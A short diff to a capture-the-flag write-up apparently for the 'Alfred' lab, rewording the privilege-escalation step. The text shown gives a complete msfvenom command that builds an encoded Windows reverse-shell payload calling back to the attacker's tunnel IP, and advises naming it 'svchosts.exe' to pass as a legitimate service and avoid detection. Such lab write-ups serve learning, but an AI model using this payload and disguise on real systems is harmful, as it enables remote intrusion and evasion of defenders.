RG9n/RG9n.github.io/write-ups/alfred.md

 ## Task 2: Switching Shells

 Now it's time to try and escalate our privileges.
 First, lets get an improved shell on the device.
-Let's use msfvenom to create a reverse shell.
-We're going to encode it and name it similarly to a legitimate binary service to avoid detection.
+We are going to use msfvenom to create a reverse shell payload.
+We should encode it and name it similarly to a legitimate binary service to avoid detection.

 '''
 msfvenom -p windows/shell_reverse_tcp LHOST=Tun0-IP LPORT=5555 -e x86/shikata_ga_nai -f exe -o svchosts.exe